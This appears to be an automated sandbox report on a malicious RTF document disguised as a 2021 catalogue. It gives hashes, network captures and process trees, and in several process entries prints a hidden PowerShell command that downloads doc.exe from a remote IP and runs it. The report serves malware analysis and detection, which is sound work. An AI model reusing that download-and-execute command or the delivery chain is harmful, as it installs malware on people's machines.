SHA-512:	78909D822CB9706155B77B85CF1F9A274BE7155C61EE71A49555932A11BA05311F308760B6BAED3338CFCBA6EC1647F010E5B13E25BDE839F67033CD20739A24
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 31%
Joe Sandbox View:	Filename: hjFNtGCV66.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ra..............0..............&... ...@....@.. ....................... ............@..................................&..O....@.. ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc..............................@..B.................&......H........@...................@...........................................0...........r...p.+....0...........r+..p.+....0..................+..".(.....^..}.....(.......(.........0.............+.s....(.......X.......-.....0..+.........,..{.......+....,...{....o........(.......0..1.........s....}.....(......{.... .....3s....o .....{....rA..po!.....{.....K..s"...o#.....{.....o$.....{....rA..po%.....{.....o&....."...@"..PAs'...((......()..... J... ....s"...(....~....rQ..p(.

C:\Users\user\AppData\Roaming\maBdogbw.exe Download File
Process:	C:\Users\user\AppData\Roaming\doc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	637440
Entropy (8bit):	6.333867454868441
Encrypted:	false
SSDEEP:	12288:JA9Ni+hBr7IUA4S8vxou4AqcUkhPXuFJ:i9Ni+hBr8UAcZtIQXQ
MD5:	D8BC91E846E3D624814D4557681F33AD
SHA1:	873F451438EFCE56D2BCE9DD9B44BEEFB2C6A28B
SHA-256:	30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E
SHA-512:	78909D822CB9706155B77B85CF1F9A274BE7155C61EE71A49555932A11BA05311F308760B6BAED3338CFCBA6EC1647F010E5B13E25BDE839F67033CD20739A24
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 31%
Joe Sandbox View:	Filename: hjFNtGCV66.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ra..............0..............&... ...@....@.. ....................... ............@..................................&..O....@.. ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc..............................@..B.................&......H........@...................@...........................................0...........r...p.+....0...........r+..p.+....0..................+..".(.....^..}.....(.......(.........0.............+.s....(.......X.......-.....0..+.........,..{.......+....,...{....o........(.......0..1.........s....}.....(......{.... .....3s....o .....{....rA..po!.....{.....K..s"...o#.....{.....o$.....{....rA..po%.....{.....o&....."...@"..PAs'...((......()..... J... ....s"...(....~....rQ..p(.

C:\Users\user\Desktop\~$talogue_2021_samples_list_revise_ol.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	3.52997043173829
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	catalogue_2021_samples_list_revise_ol.doc
File size:	548674
MD5:	84c45c2b0e94b8d1d064e739150ba84c
SHA1:	f6a98ac4e50a89495626b5eaebb85d1116554faa
SHA256:	7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32
SHA512:	8fb31fc4147af9e1568c9799307b3d5a8b4a3ed607e14061769f239ce4dd9b10464b9f878900c8777f1550b9a9e8cdfb7901bb22d6fa958f9761a4831ddf6162
SSDEEP:	12288:z////////////////////////////////////CAggMdzFHRsU0:evRsU0
File Content Preview:	{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000965h	2	embedded	package	171502	abdtfhgXgeghDh.ScT	C:\nsdsTggX\abdtfhgXGeghDh.ScT	C:\CbkepaDw\abdtfhghgeghDh.ScT	no
1	00057BCCh	2	embedded	OLE2LInk	2560				no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/28/21-21:17:36.156210	TCP	1560	WEB-MISC /doc/ access	49167	80	192.168.2.22	13.92.100.208
09/28/21-21:17:36.156210	TCP	2022550	ET TROJAN Possible Malicious Macro DL EXE Feb 2016	49167	80	192.168.2.22	13.92.100.208
09/28/21-21:17:41.511834	TCP	1560	WEB-MISC /doc/ access	49168	80	192.168.2.22	13.92.100.208

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 21:17:36.053939104 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.154908895 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.155019999 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.156209946 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.257023096 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.257581949 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.257618904 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.257668018 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.257685900 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.257699966 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.257716894 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.257721901 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.257741928 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.257745981 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.257755041 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.257781029 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.257786989 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.257797956 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.257818937 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.257850885 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.257865906 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.257873058 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.257878065 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.258203983 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.258229971 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.265327930 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358557940 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358642101 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358666897 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358688116 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358697891 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358711958 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358717918 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358721972 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358747005 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358752966 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358767033 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358792067 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358812094 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358833075 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358846903 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358853102 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358855009 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358856916 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358875990 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358900070 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.358907938 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358912945 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358916998 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.358999968 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.359025002 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.359054089 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.359060049 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.359066010 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.359070063 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.359096050 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.359119892 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.359165907 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.359174013 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.359177113 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.359179020 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.359709978 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.359720945 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.359756947 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.359803915 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.359813929 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.360781908 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.459652901 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459692001 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459717035 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459741116 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459767103 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459794998 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459819078 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459819078 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.459837914 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.459842920 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.459845066 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459855080 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.459901094 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459924936 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459947109 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459969044 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.459969044 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.459975958 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.459979057 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.460158110 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.460208893 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.460210085 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.460215092 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.460218906 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.460253000 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.460314035 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.460345030 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.460350990 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.460354090 CEST	49167	80	192.168.2.22	13.92.100.208
Sep 28, 2021 21:17:36.460355043 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.460380077 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.460402966 CEST	80	49167	13.92.100.208	192.168.2.22
Sep 28, 2021 21:17:36.460437059 CEST	49167	80	192.168.2.22	13.92.100.208

HTTP Request Dependency Graph

13.92.100.208

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	13.92.100.208	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 21:17:36.156209946 CEST	0	OUT	GET /doc/doc.exe HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 13.92.100.208 Connection: Keep-Alive
Sep 28, 2021 21:17:36.257581949 CEST	1	IN	HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 19:17:36 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Tue, 28 Sep 2021 06:16:15 GMT ETag: "9ba00-5cd08269fe9c0" Accept-Ranges: bytes Content-Length: 637440 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2e b3 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 07 00 00 b0 02 00 00 00 00 00 f2 26 07 00 00 20 00 00 00 40 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 26 07 00 4f 00 00 00 00 40 07 00 20 ad 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 06 07 00 00 20 00 00 00 08 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 ad 02 00 00 40 07 00 00 ae 02 00 00 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 26 07 00 00 00 00 00 48 00 00 00 02 00 05 00 04 40 00 00 0c a6 02 00 03 00 00 00 0f 00 00 06 10 e6 02 00 90 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 2b 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 02 00 00 11 00 19 8d 12 00 00 01 0a 2b 00 06 2a 22 02 28 18 00 00 0a 00 2a 5e 02 14 7d 01 00 00 04 02 28 19 00 00 0a 00 00 02 28 08 00 00 06 00 2a 00 00 00 13 30 02 00 1d 00 00 00 03 00 00 11 00 16 0a 2b 0f 73 0c 00 00 06 28 1a 00 00 0a 00 06 17 58 0a 06 17 fe 04 0b 07 2d e9 2a 00 00 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 1b 00 00 0a 00 00 02 03 28 1c 00 00 0a 00 2a 00 13 30 04 00 31 01 00 00 01 00 00 11 00 02 73 1d 00 00 0a 7d 03 00 00 04 02 28 1e 00 00 0a 00 02 7b 03 00 00 04 20 85 00 00 00 1f 33 73 1f 00 00 0a 6f 20 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 21 00 00 0a 00 02 7b 03 00 00 04 1f 4b 1f 17 73 22 00 00 0a 6f 23 00 00 0a 00 02 7b 03 00 00 04 16 6f 24 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 25 00 00 0a 00 02 7b 03 00 00 04 17 6f 26 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 27 00 00 0a 28 28 00 00 0a 00 02 17 28 29 00 00 0a 00 02 20 4a 01 00 00 20 0c 01 00 00 73 22 00 00 0a 28 2a 00 00 0a 00 7e 9f 00 00 04 72 51 00 00 70 28 0a 00 00 06 0a 02 06 6f 2b 00 00 0a 16 06 6f 2c 00 00 0a 28 2d 00 00 0a 28 09 00 00 06 00 02 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL.Ra0& @@ @&O@ H.text `.rsrc @@@.reloc@B&H@@0rp+0r+p+0+"(^}((0+s(X-0+,{+,{o(01s}({ 3so {rApo!{Ks"o#{o${rApo%{o&"@"PAs'((() J s"(~rQp(o+o,(-(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	13.92.100.208	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 21:17:41.511833906 CEST	669	OUT	GET /doc/doc.exe HTTP/1.1 Host: 13.92.100.208 Connection: Keep-Alive
Sep 28, 2021 21:17:41.613955021 CEST	671	IN	HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 19:17:41 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Tue, 28 Sep 2021 06:16:15 GMT ETag: "9ba00-5cd08269fe9c0" Accept-Ranges: bytes Content-Length: 637440 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2e b3 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 07 00 00 b0 02 00 00 00 00 00 f2 26 07 00 00 20 00 00 00 40 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 26 07 00 4f 00 00 00 00 40 07 00 20 ad 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 06 07 00 00 20 00 00 00 08 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 ad 02 00 00 40 07 00 00 ae 02 00 00 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 26 07 00 00 00 00 00 48 00 00 00 02 00 05 00 04 40 00 00 0c a6 02 00 03 00 00 00 0f 00 00 06 10 e6 02 00 90 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 2b 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 02 00 00 11 00 19 8d 12 00 00 01 0a 2b 00 06 2a 22 02 28 18 00 00 0a 00 2a 5e 02 14 7d 01 00 00 04 02 28 19 00 00 0a 00 00 02 28 08 00 00 06 00 2a 00 00 00 13 30 02 00 1d 00 00 00 03 00 00 11 00 16 0a 2b 0f 73 0c 00 00 06 28 1a 00 00 0a 00 06 17 58 0a 06 17 fe 04 0b 07 2d e9 2a 00 00 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 1b 00 00 0a 00 00 02 03 28 1c 00 00 0a 00 2a 00 13 30 04 00 31 01 00 00 01 00 00 11 00 02 73 1d 00 00 0a 7d 03 00 00 04 02 28 1e 00 00 0a 00 02 7b 03 00 00 04 20 85 00 00 00 1f 33 73 1f 00 00 0a 6f 20 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 21 00 00 0a 00 02 7b 03 00 00 04 1f 4b 1f 17 73 22 00 00 0a 6f 23 00 00 0a 00 02 7b 03 00 00 04 16 6f 24 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 25 00 00 0a 00 02 7b 03 00 00 04 17 6f 26 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 27 00 00 0a 28 28 00 00 0a 00 02 17 28 29 00 00 0a 00 02 20 4a 01 00 00 20 0c 01 00 00 73 22 00 00 0a 28 2a 00 00 0a 00 7e 9f 00 00 04 72 51 00 00 70 28 0a 00 00 06 0a 02 06 6f 2b 00 00 0a 16 06 6f 2c 00 00 0a 28 2d 00 00 0a 28 09 00 00 06 00 02 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL.Ra0& @@ @&O@ H.text `.rsrc @@@.reloc@B&H@@0rp+0r+p+0+"(^}((0+s(X-0+,{+,{o(01s}({ 3so {rApo!{Ks"o#{o${rApo%{o&"@"PAs'((() J s"(~rQp(o+o,(-(

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2608 Parent PID: 596

General

Start time:	21:17:20
Start date:	28/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f130000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 1868 Parent PID: 2608

General

Start time:	21:17:23
Start date:	28/09/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Imagebase:	0x13f640000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.426889851.00000000001E0000.00000004.00000020.sdmp, Author: Florian Roth
Reputation:	high

Analysis Process: powershell.exe PID: 2968 Parent PID: 2608

General

Start time:	21:17:24
Start date:	28/09/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Imagebase:	0x13f640000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.429130471.0000000000260000.00000004.00000020.sdmp, Author: Florian Roth
Reputation:	high

Analysis Process: powershell.exe PID: 1308 Parent PID: 2608

General

Start time:	21:17:24
Start date:	28/09/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
Imagebase:	0x13f640000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: doc.exe PID: 2832 Parent PID: 2968

General

Start time:	21:17:29
Start date:	28/09/2021
Path:	C:\Users\user\AppData\Roaming\doc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\doc.exe'
Imagebase:	0x200000
File size:	637440 bytes
MD5 hash:	D8BC91E846E3D624814D4557681F33AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
